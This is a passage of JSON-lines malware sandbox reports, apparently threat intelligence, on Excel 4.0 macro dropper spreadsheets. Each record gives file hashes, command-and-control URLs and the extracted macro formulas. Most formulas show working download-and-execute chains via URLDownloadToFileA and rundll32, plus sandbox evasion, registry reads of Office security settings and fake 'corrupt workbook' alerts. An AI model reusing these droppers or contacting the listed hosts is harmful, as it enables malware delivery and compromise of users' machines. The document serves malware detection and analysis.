Macro","c2":["http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png","http://icietdemain.fr/contents/2020/02/idle/222222.png","http://careers.sorint.it/idle/33333.png","http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://samphaopet.com/wp-content/uploads/2020/02/idle/111111.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://icietdemain.fr/contents/2020/02/idle/222222.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://careers.sorint.it/idle/33333.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://uniluisgpaez.edu.co/wp-content/uploads/2020/02/idle/444444.png\",\"c:\\Users\\Public\\asd2asff32.exe\",0,0),GOTO(EXEC(\"c:\\Users\\Public\\asd2asff32.exe\")))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nEXEC(\"c:\\Users\\Public\\asd2asff32.exe\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"pUMlSQeTbK\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3555867d09c70ce950c731309e62311eb7fef7d9f718cd7bf3b50baeb6f259b8"},"analysis":{"reported":"2020-04-09T16:15:43Z","score":10},"files":[{"filename":"3555867d09c70ce950c731309e62311eb7fef7d9f718cd7bf3b50baeb6f259b8","filesize":167936,"md5":"ad05e25fea9ebd778377068c9015950c","sha1":"8028a81ecd273219845b6dc76af9a84cddb17697","sha256":"3555867d09c70ce950c731309e62311eb7fef7d9f718cd7bf3b50baeb6f259b8","sha512":"b71960e63f8c5f9bf10203b64f4beae37c50ddc1862491c5d6867d61ad60209dd59a86de162c04e376807721f5150c40dc23ba4f50cab34256f764d6ace98876","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3555867d09c70ce950c731309e62311eb7fef7d9f718cd7bf3b50baeb6f259b8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MmcCqqfnl8\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3567d93d421d1089c0271a924e5dafee52f09f18fdfa7e3d463a13ed87043d8b"},"analysis":{"reported":"2020-04-09T16:15:44Z","score":10},"files":[{"filename":"3567d93d421d1089c0271a924e5dafee52f09f18fdfa7e3d463a13ed87043d8b","filesize":221184,"md5":"220974964e7e38248f945e659bdd32ec","sha1":"a0f171eefb20da9e83d2ade93e151cd8f42bfbe9","sha256":"3567d93d421d1089c0271a924e5dafee52f09f18fdfa7e3d463a13ed87043d8b","sha512":"9036707b4f2047ff78b3af11b837ed2c8beab60cab443386d3d274509180fb52beb652b37d1a7d6fbbb01b811323f81f5028fe2c84b0572999bcbbefc3c6049f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3567d93d421d1089c0271a924e5dafee52f09f18fdfa7e3d463a13ed87043d8b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"iyJlJt3R9N\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"35807ffa0982123347d30672a422ac41b4e0c9ef302e4b2050c374d53497bc79"},"analysis":{"reported":"2020-04-09T16:15:44Z","score":10},"files":[{"filename":"35807ffa0982123347d30672a422ac41b4e0c9ef302e4b2050c374d53497bc79","filesize":185344,"md5":"445943f0a231b15c05b28a3a0c8bcb20","sha1":"f6db5db53762beef815426b2bc3b4c51878ab5e5","sha256":"35807ffa0982123347d30672a422ac41b4e0c9ef302e4b2050c374d53497bc79","sha512":"f9578a8966ba6fd4c501045f5efd6d735d444e1862f1415701dd49911bbef92d668951a87a8224f850810bb2c13ac30b5657f23a79a4efead9db30500abeecaa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"35807ffa0982123347d30672a422ac41b4e0c9ef302e4b2050c374d53497bc79.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3588423667a61711deeff839ae9737808656138b6d1aa4656eb240053a338e40"},"analysis":{"reported":"2020-04-09T16:15:44Z","score":10},"files":[{"filename":"3588423667a61711deeff839ae9737808656138b6d1aa4656eb240053a338e40","filesize":177152,"md5":"fd2fc906830783d6aa432f1914a21e75","sha1":"c86ed63f79b786f252d8ad2d617fc8860994749d","sha256":"3588423667a61711deeff839ae9737808656138b6d1aa4656eb240053a338e40","sha512":"b94d0a86210c1c7c41c1f807778c66c7ea86a97aa5070d63e49c0259a7ff426e59c8c04dc420b3d4c309b15ee672d27e330549e4839f18ab0970defbaf997b67","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3588423667a61711deeff839ae9737808656138b6d1aa4656eb240053a338e40.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3UGAnGo7GW\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"35925a9c2049c7e01ecaae36c147050455be0e625f7f420d66e4f4aa4a0feea5"},"analysis":{"reported":"2020-04-09T16:15:44Z","score":10},"files":[{"filename":"35925a9c2049c7e01ecaae36c147050455be0e625f7f420d66e4f4aa4a0feea5","filesize":144384,"md5":"82e8c79f588ead7b9b3bcdaa429fca3b","sha1":"2eeb62991c83e52750fe37c09616d0922721102f","sha256":"35925a9c2049c7e01ecaae36c147050455be0e625f7f420d66e4f4aa4a0feea5","sha512":"1e4fa5e2966ab293d6b47582d50e8267c97b2b59c9ed69d100e4e996b6f114d92f515548e3057bd3bf5b09db57c5abaf7801325b23f6756c934eeb06a3621238","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"35925a9c2049c7e01ecaae36c147050455be0e625f7f420d66e4f4aa4a0feea5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"yCUtasX2Tf\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"35a39389034c4413b02b4d16e84b204446a6786c3c744a1ddecb7a3b7ded24a3"},"analysis":{"reported":"2020-04-09T16:15:44Z","score":10},"files":[{"filename":"35a39389034c4413b02b4d16e84b204446a6786c3c744a1ddecb7a3b7ded24a3","filesize":206336,"md5":"e02273ceccbc5d2bfef9b5a37b6c4198","sha1":"7a5b994291d40441c78783c346eacb753a877beb","sha256":"35a39389034c4413b02b4d16e84b204446a6786c3c744a1ddecb7a3b7ded24a3","sha512":"3fb288eb0eee535a7336e0b222a00db39dd88490705e69edf7000f302781b022413221a5e33ba7ef2c2837ae84bebdaf6fe61542f002d6fdef31320c7bc4094f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"35a39389034c4413b02b4d16e84b204446a6786c3c744a1ddecb7a3b7ded24a3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7PiRTpTpEl\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"35a4dfa62af33f89cd9fe7000405b22df960613f562f7f92b5d8744ee6fb7a8c"},"analysis":{"reported":"2020-04-09T16:15:44Z","score":10},"files":[{"filename":"35a4dfa62af33f89cd9fe7000405b22df960613f562f7f92b5d8744ee6fb7a8c","filesize":214016,"md5":"93c513239b87895bcbebe3dd38ec3f39","sha1":"309646db7b065839b8b964ba06f35e957244208d","sha256":"35a4dfa62af33f89cd9fe7000405b22df960613f562f7f92b5d8744ee6fb7a8c","sha512":"2682f8f739c3a55aeb60c9f00e9010ccdae3e98bd03924c2be1b20b7c3642af8c6340a0a8d4d0dbf5ea283ec5d6c48ee2419148bab1597fcd858efa0a6a54fb8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"35a4dfa62af33f89cd9fe7000405b22df960613f562f7f92b5d8744ee6fb7a8c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"TQM5fyvglc\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"35b81041d121d1f4dd51fba17baa21a3edd6bcffca51ac471289bb1ca2af8312"},"analysis":{"reported":"2020-04-09T16:15:44Z","score":10},"files":[{"filename":"35b81041d121d1f4dd51fba17baa21a3edd6bcffca51ac471289bb1ca2af8312","filesize":209920,"md5":"bfdf5bbe6a937728adfc9909274daf80","sha1":"fc47a0bd59bfeb828b000eeca8b9e985d090c03c","sha256":"35b81041d121d1f4dd51fba17baa21a3edd6bcffca51ac471289bb1ca2af8312","sha512":"169c2ee2146fab035f97688e1e8f3eed903522332bf7f314326ed4cd7d9f84b5d2b2f09a75b2a6f13ab79653a30cd9277c2f8453bf174781a1b12599e4d80c17","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"35b81041d121d1f4dd51fba17baa21a3edd6bcffca51ac471289bb1ca2af8312.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Uyt9vU4vwy\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"35cd044f53d1fdd2825d6e8b923029c9b7c39da7619f4859ebe0fdb1e4c901ef"},"analysis":{"reported":"2020-04-09T16:15:44Z","score":10},"files":[{"filename":"35cd044f53d1fdd2825d6e8b923029c9b7c39da7619f4859ebe0fdb1e4c901ef","filesize":212992,"md5":"e8b3a6714f7440199d50840eb2e9b1b1","sha1":"f41ffeddd2d5465d41fc9e391e59a6f26f43f1d8","sha256":"35cd044f53d1fdd2825d6e8b923029c9b7c39da7619f4859ebe0fdb1e4c901ef","sha512":"3116390dca03b0324e3185d94680d8ef1ec972c15979c6c91eecd31287e5bf1d2add93ac2c754cd29dae7af752032a94d8d830bf14f30a97ad97e44fcb12560d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"35cd044f53d1fdd2825d6e8b923029c9b7c39da7619f4859ebe0fdb1e4c901ef.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gANKv0drMf\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"35d12e133c88a01374e6cef4fcdfae0373031b9d5de55f05ff0896b0e3fc4b75"},"analysis":{"reported":"2020-04-09T16:15:44Z","score":10},"files":[{"filename":"35d12e133c88a01374e6cef4fcdfae0373031b9d5de55f05ff0896b0e3fc4b75","filesize":185344,"md5":"baaef7b3bdaf1d84fadd17331180ef6f","sha1":"79e7302e84a58286ae77d41c3fe1eac7f5cafad4","sha256":"35d12e133c88a01374e6cef4fcdfae0373031b9d5de55f05ff0896b0e3fc4b75","sha512":"b990359eff1a8cbbe36614d139c876bfbe86cbc9f2b15c51180949c67c5c9acde21b24df8e0f7e4de5e1f15c23e9d28d17ca67d98f05dc227d2d38e831869f3e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"35d12e133c88a01374e6cef4fcdfae0373031b9d5de55f05ff0896b0e3fc4b75.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"360d87f4b7b6dc347d698451e25b82254cd4965bbff2461bbad003538c9fffd4"},"analysis":{"reported":"2020-04-09T16:15:44Z","score":10},"files":[{"filename":"360d87f4b7b6dc347d698451e25b82254cd4965bbff2461bbad003538c9fffd4","filesize":145408,"md5":"2ad5993c7781bcc2ce889e5e7d5f997d","sha1":"8b6bb5434a907e14e233fc563fcdbdd647ac8515","sha256":"360d87f4b7b6dc347d698451e25b82254cd4965bbff2461bbad003538c9fffd4","sha512":"cd498cb164ef41fb9250dcd9a748fe1df416d49ad12e4db8a04fd580b0b51dd27c299a94a9a2555c320cac752471dfb3631397c87aecd7b4d588af741b928e6f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"360d87f4b7b6dc347d698451e25b82254cd4965bbff2461bbad003538c9fffd4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://studyshine.in/wp-cryn.php","https://arturkauf.pl/wp-cryn.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://studyshine.in/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://arturkauf.pl/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"zPQG5XJvCE\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3623179058fbd169b06f1cb48c06bd9379bf5bc2564cb9bdfacc7c8fd18c1c54"},"analysis":{"reported":"2020-04-09T16:15:44Z","score":10},"files":[{"filename":"3623179058fbd169b06f1cb48c06bd9379bf5bc2564cb9bdfacc7c8fd18c1c54","filesize":206336,"md5":"32f8f764d39655bf82390e1d7ffa63a8","sha1":"a6de78105a2fe500dce42023cc72c3728d3a9f1f","sha256":"3623179058fbd169b06f1cb48c06bd9379bf5bc2564cb9bdfacc7c8fd18c1c54","sha512":"f90f578d88afc002f1a2d6dfffbcbe0413f5673571d0ba4c41b60119a26cd09a6bc2b5a975aca90ccf6fd2eb85c08438212bea627ffa068fc73a87f43cd51b41","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3623179058fbd169b06f1cb48c06bd9379bf5bc2564cb9bdfacc7c8fd18c1c54.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KwKASKAqIp\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3625f643b2fea6bb8b58c167d860c1ce3316ee6b151360105ee7eb03b5dd0b38"},"analysis":{"reported":"2020-04-09T16:15:44Z","score":10},"files":[{"filename":"3625f643b2fea6bb8b58c167d860c1ce3316ee6b151360105ee7eb03b5dd0b38","filesize":104448,"md5":"558f0d312a68fb53b48ba58f321c4e7a","sha1":"422f3ca0dbee059fd2fa93a6bdae159b8b805009","sha256":"3625f643b2fea6bb8b58c167d860c1ce3316ee6b151360105ee7eb03b5dd0b38","sha512":"00f016e27baec7f485247b52f09c7360bca1550a671187b559b15940add771fe57caf0932824dc134ec18defad30465660884942c3ba349d832ac92967412433","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3625f643b2fea6bb8b58c167d860c1ce3316ee6b151360105ee7eb03b5dd0b38.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"NqpLf7jjZK\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
